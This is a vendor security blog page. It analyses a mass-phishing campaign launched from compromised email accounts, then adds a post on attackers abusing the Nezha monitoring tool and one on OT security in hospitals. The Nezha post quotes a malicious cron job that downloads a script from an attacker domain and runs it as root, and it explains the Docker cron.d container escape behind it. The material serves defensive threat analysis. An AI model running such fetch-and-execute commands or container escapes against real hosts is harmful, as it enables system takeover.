Blog
/
Email
/
April 20, 2022

Email Compromise To Mass Phishing Campaign

Read Darktrace's in-depth analysis on the shift from business email compromise to mass phishing campaigns. Gain the knowledge to safeguard your business.
Written by
Shuh Chin Goh
Written by
Sam Lister
Specialist Security Researcher
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Shuh Chin Goh
Written by
Sam Lister
Specialist Security Researcher
Default blog image
20
Apr 2022

It is common for attackers to send large volumes of malicious emails from the email accounts which they compromise. Before carrying out this mass-mailing activity, there are predictable, preparatory steps which attackers take, such as registering mass-mailing applications and creating new inbox rules. In this blog, we will provide details of an attack observed in February 2022 in which a threat actor conducted a successful mass-mailing attack at a financial company based in Africa.

Attack summary

In February 2022, an attacker attempted to infiltrate the email environment of a financial services company based in Africa. At the beginning of February, the attacker likely gained a foothold in the company’s email environment by tricking an internal user into entering the credentials of their corporate email account into a phishing page. Over the following week, the attacker used the compromised account credentials to conduct a variety of activities, such as registering a mass-mailing application and creating a new inbox rule.

After taking these preparatory steps, the attacker went on to send out large volumes of phishing emails from the internal user’s email account. The attacker consequently obtained the credentials of several further internal corporate accounts. They used the credentials of one of these accounts to carry out similar preparatory steps (registering a mass-mailing application and creating a new inbox rule). After taking these steps, the attacker again sent large volumes of phishing emails from the account. At this point, the customer requested assistance from Darktrace’s SOC to aid investigation, and the intrusion was consequently contained by the company.

Since the attacker carried out their activities using a VPN and an Amazon cloud service, the endpoints from which the activities took place did not serve as particularly helpful indicators of an attack. However, prior to sending out phishing emails from internal users’ accounts, the attacker did carry out other predictable, preparatory activities. One of the main goals of this blog is to highlight that these behaviors serve as valuable signs of preparation for mass-mailing activity.

Attack timeline

Figure 1: Timeline of the intrusion

On February 3, the attacker sent a phishing email to the corporate account of an employee. The email was sent from the corporate account of an employee at a company with business ties to the victim enterprise. It is likely that the attacker had compromised this account prior to sending the phishing email from it. The phishing email in question claimed to be an overdue payment reminder. Within the email, there was a link hidden behind the display text “view invoice”. The hostname of the phishing link’s URL was a subdomain of questionpro[.]eu — an online survey platform. The page referred to by the URL was a fake Microsoft Outlook login page.

Figure 2: Destination of phishing link within the email sent by the attacker

Antigena Email, Darktrace’s email security solution, identified the highly unusual linguistic structure of the email, given its understanding of ‘normal’ for that sender. This was reflected in an inducement shift score of 100. However, in this case, the original URL of the phishing link was rewritten by Mimecast’s URL protection service in a way which made the full URL impossible to extract. Consequently, Antigena Email did not know what the original URL of the link was. Since the link was rewritten by Mimecast’s URL protection service, the email’s recipient will have received a warning notification in their browser upon clicking the link. It seems that the recipient ignored the warning, and consequently divulged their email account credentials to the attacker.

For Antigena Email to hold an email from a user’s mailbox, it must judge with high confidence that the email is malicious. In cases where the email contains no suspicious attachments or links, it is difficult for Antigena Email to obtain such high degrees of confidence, unless the email displays clear payload-independent malicious indicators, such as indicators of spoofing or indicators of extortion. In this case, the email, as seen by Antigena Email, didn’t contain any suspicious links or attachments (since Mimecast had rewritten the suspicious link) and the email didn’t contain any indicators of spoofing or extortion.

Figure 3: The email’s high inducement shift score highlights that the email’s linguistic content and structure were unusual for the email’s sender

Shortly after receiving the email, the internal user’s corporate device was observed making SSL connections to the questionpro[.]eu phishing endpoint. It is likely that the user divulged their email account credentials during these connections.

Figure 4: The above screenshot — obtained from Advanced Search — depicts the connections made by the account owner’s device on February 3

Between February 3 and February 7, the attacker logged into the user’s email account several times. Since these logins were carried out using a common VPN service, they were not identified as particularly unusual by Darktrace. However, during their login sessions, the attacker exhibited behavior which was highly unusual for the email account’s owner. The attacker was observed creating an inbox rule called “ _ ” on the user’s email account,[1] as well as registering and granting permissions to a mass-mailing application called Newsletter Software SuperMailer. These steps were taken by the attacker in preparation for their subsequent mass-mailing activity.

On February 7, the attacker sent out phishing emails from the user’s account. The emails were sent to hundreds of internal and external mailboxes. The email claimed to be an overdue payment reminder and it contained a questionpro[.]eu link hidden behind the display text “view invoice”. It is likely that the inbox rule created by the attacker caused all responses to this phishing email to be deleted. Attackers regularly create inbox rules on the email accounts which they compromise to ensure that responses to the malicious emails which they distribute are hidden from the accounts’ owners.[2]

Since Antigena Email does not have visibility of internal-to-internal emails, the phishing email was delivered fully weaponized to hundreds of internal mailboxes. On February 7, after the phishing email was sent from the compromised internal account, more than twenty internal devices were observed making SSL connections to the relevant questionpro[.]eu endpoint, indicating that many internal users had clicked the phishing link and possibly revealed their account credentials to the attacker.

Figure 5: The above screenshot — obtained from Advanced Search — depicts the large volume of connections made by internal devices to the phishing endpoint

Over the next five days, the attacker was observed logging into the corporate email accounts of at least six internal users. These logins were carried out from the same VPN endpoints as the attacker’s original logins. On February 11, the attacker was observed creating an inbox rule named “ , ” on one of these accounts. Shortly after, the attacker went on to register and grant permissions to the same mass-mailing application, Newsletter Software SuperMailer. As with the other account, these steps were taken by the attacker in preparation for subsequent mass-mailing activity.

Figure 6: The above screenshot — obtained from Advanced Search — outlines all of the actions involving the mass-mailing application that were taken by the attacker (accounts have been redacted)

On February 11, shortly after 08:30 (UTC), the attacker widely distributed a phishing email from this second user’s account. The phishing email was distributed to hundreds of internal and external mailboxes. Unlike the other phishing emails used by the attacker, this one claimed to be a purchase order notification, and it contained an HTML file named PurchaseOrder.html. Within this file, there was a link to a suspicious page on the public relations (PR) news site, everything-pr[.]com. After the phishing email was sent from the compromised internal account, more than twenty internal devices were observed making SSL connections to the relevant everything-pr[.]com endpoint, indicating that many internal users had opened the malicious attachment.

Figure 7: The above screenshot — obtained from Advanced Search — depicts the connections made by internal devices to the endpoint referenced in the malicious attachment

On February 11, the customer submitted an Ask the Expert (ATE) request to Darktrace’s SOC team. The guidance provided by the SOC helped the security team to contain the intrusion. The attacker managed to maintain a presence within the organization’s email environment for eight days. During these eight days, the attacker sent out large volumes of phishing emails from two corporate accounts. Before sending out these phishing emails, the attacker carried out predictable, preparatory actions. These actions included registering a mass-mailing application with Azure AD and creating an inbox rule.

Darktrace guidance

There are many learning points for this particular intrusion. First, it is important to be mindful of signs of preparation for malicious mass-mailing activity. After an attacker compromises an email account, there are several actions which they will likely perform before they send out large volumes of malicious emails. For example, they may create an inbox rule on the account, and they may register a mass-mailing application with Azure AD. The Darktrace models SaaS / Compliance / New Email Rule and SaaS / Admin / OAuth Permission Grant are designed to pick up on these behaviors.

Second, in cases where an attacker succeeds in sending out phishing emails from an internal, corporate account, it is advised that customers make use of Darktrace’s Advanced Search to identify users that may have divulged account credentials to the attacker. The phishing email sent from the compromised account will likely contain a suspicious link. Once the hostname of the link has been identified, it is possible to ask Advanced Search to display all HTTP or SSL connections to the host in question. If the hostname is www.example.com, you can get Advanced Search to display all SSL connections to the host by using the Advanced Search query, @fields.server_name:"www.example.com", and you can get Advanced Search to display all HTTP connections to the host by using the query, @fields.host:"www.example.com".

Third, it is advised that customers make use of Darktrace’s ‘watched domains’ feature[3] in cases where an attacker succeeds in sending out malicious emails from the accounts they compromise. If a hostname is added to the watched domains list, then a model named Compromise / Watched Domain will breach whenever an internal device is observed connecting to it. If Antigena Network is configured, then observed attempts to connect to the relevant host will be blocked if the hostname is added to the watched domains list with the ‘flag for Antigena’ toggle switched on. If an attacker succeeds in sending out a malicious email from an internal, corporate account, it is advised that customers add hostnames of phishing links within the email to the watched domains list and enable the Antigena flag. Doing so will cause Darktrace to identify and thwart any attempts to connect to the relevant phishing endpoints.

Figure 8: The above screenshot — obtained from the Model Editor — shows that Antigena Network prevented ten internal devices from connecting to phishing endpoints after the relevant phishing hostnames were added to the watched domains list on February 11

For Darktrace customers who want to find out more about phishing detection, refer here for an exclusive supplement to this blog.

MITRE ATT&CK techniques observed

Thanks to Paul Jennings for his contributions.

Footnotes

1. https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps

2. https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html

3. https://customerportal.darktrace.com/product-guides/main/watched-domains

Written by
Shuh Chin Goh
Written by
Sam Lister
Specialist Security Researcher
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Shuh Chin Goh
Written by
Sam Lister
Specialist Security Researcher

How Attackers Abuse the Chinese Nezha Monitoring Tool

Network
June 10, 2026
Nathaniel Bill
Malware Research Engineer
Watch the NIS2 Webinar
Trending blogs
1
Prompt Security in Enterprise AI: Strengths, Weaknesses, and Common Approaches
May 20, 2026
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
Email
May 26, 2026

Journey of a Threat: How Multi-Layered AI Works in Darktrace / EMAIL

Follow a malicious email as it moves through Darktrace / EMAIL’s multi-layered AI system, from raw data to final decision. Each layer works together to detect threats, understand intent, and take autonomous action.
Jamie Bali
Technical Author (AI) Developer
Read more
Email
May 1, 2026

How email-delivered prompt injection attacks can target enterprise AI – and why it matters

Prompt injection is a newly emerging threat, with only a handful of confirmed victims so far – targeting how AI systems use data rather than exploiting traditional software vulnerabilities. As agentic AI becomes embedded across enterprise environments, attackers may attempt to manipulate these systems through hidden instructions in everyday email content.
Kiri Addison
Senior Director of Product
Read more
Email
March 24, 2026

Darktrace Unites Human Behavior and Threat Detection Across Email, Slack, Teams, and Zoom

Introducing the adaptive era of email security: a unified platform that connects personalized coaching, collaboration tools, and user behavior into a self-improving defense system.
Carlos Gray
Senior Product Marketing Manager, Email
Read more

Blog

/

Network

/

June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

nezha monitoring toolDefault blog imageDefault blog image

What is Nezha?

Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.

The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.

However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.

Darktrace’s analysis of a Nezha infection

Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.

The malicious container create command.
Figure 1: The malicious container create command.

Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.

These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.

The attacker the created a malicious cron job named ngk:
* * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash

This resulted in the host downloading and running the linux_install.sh file with root privileges.

The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.

The linux_install script.
Figure 2: The linux_install script.

The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.

Open by design

One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.

The attacker’s Nezha dashboard.
Figure 3: The attacker’s Nezha dashboard.

At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible.  The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.

The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.

Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.

Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.

At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.

Key takeaways

The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.

This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.

This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

OT

/

June 9, 2026

Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures

healthcare OTDefault blog imageDefault blog image

Rethinking the healthcare attack surface

When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems. 

These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.

The OT cybersecurity expertise gap in healthcare organizations

Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.

On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees  dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.

When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications. 

What these findings reveal

Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.  

Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that  focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.  

However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.

Why OT cybersecurity expertise can be effective for healthcare organizations

The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time.  As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology. 

What can healthcare organizations do to secure their OT

Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience. 

However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes.  In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.  

In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy. 

[related-resource]

Continue reading
About the author
Daniel Simonds
Director of Operational Technology
Your data. Our AI.
Elevate your network security with Darktrace AI